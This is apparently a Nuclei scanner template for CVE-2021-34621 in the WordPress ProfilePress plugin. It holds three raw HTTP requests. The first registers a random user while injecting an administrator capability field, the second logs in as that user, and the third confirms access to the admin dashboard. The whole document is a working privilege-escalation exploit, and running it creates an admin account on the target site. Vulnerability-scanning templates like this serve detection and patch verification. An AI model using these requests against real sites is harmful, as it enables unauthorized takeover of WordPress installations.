id: CVE-2021-34621 info: name: WordPress ProfilePress wp-user-avatar plugin make admin users author: 0xsapra severity: critical reference: https://www.wordfence.com/blog/2021/06/easily-exploitable-critical-vulnerabilities-patched-in-profilepress-plugin tags: cve,cve2021,wordpress,wp-plugin requests: - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------138742543134772812001999326589 Origin: {{BaseURL}} Referer: {{BaseURL}} Connection: close -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="reg_username" {{randstr}} -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="reg_email" {{randstr}}@example.com -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="reg_password" {{randstr}}@example.com -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="reg_password_present" true -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="reg_first_name" {{randstr}}@example.com -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="reg_last_name" {{randstr}}@example.com -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="_wp_http_referer" /wp/?page_id=18 -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="pp_current_url" {{BaseURL}} -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="wp_capabilities[administrator]" 1 -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="signup_form_id" 1 -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="signup_referrer_page" -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="action" pp_ajax_signup -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="melange_id" -----------------------------138742543134772812001999326589-- - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Origin: {{BaseURL}} Referer: {{BaseURL}} Connection: close log={{randstr}}@example.com&pwd={{randstr}}@example.com&wp-submit=Log+In - | GET /wp-admin/ HTTP/1.1 Host: {{Hostname}} Accept: */* Connection: close cookie-reuse: true matchers-condition: and matchers: - type: word part: body words: - "Welcome to your WordPress Dashboard" - type: status status: - 200